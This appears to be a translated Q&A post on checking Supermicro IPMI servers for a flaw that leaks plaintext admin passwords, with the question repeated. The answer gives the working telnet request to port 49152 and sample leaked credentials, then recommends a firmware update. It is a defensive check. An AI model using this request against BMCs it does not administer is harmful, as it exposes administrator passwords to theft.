我有一些运行IPMI的Supermicro服务器,并且如本博客中所述(http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras),存在一个严重的漏洞从任何远程位置获取纯文本管理员密码。
如何检查服务器主板是否损坏?
我有一些运行IPMI的Supermicro服务器,并且如本博客中所述(http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras),存在一个严重的漏洞从任何远程位置获取纯文本管理员密码。
如何检查服务器主板是否损坏?
Answers:
只需通过telnet到端口49152中的IPMI IP地址并执行特定的GET请求即可。如果您遭到入侵,应该获取用户名和密码。
telnet server.example.com 49152
在连接请求GET /PSBlock并观察结果之后,应该是这样的:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
回答:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
要解决此问题,请将IPMI固件更新到最新版本。该固件特定于您的IPMI控制器,因此您应该在Supermicro网站上获得指定的固件。
然后,在更新固件后,更改密码。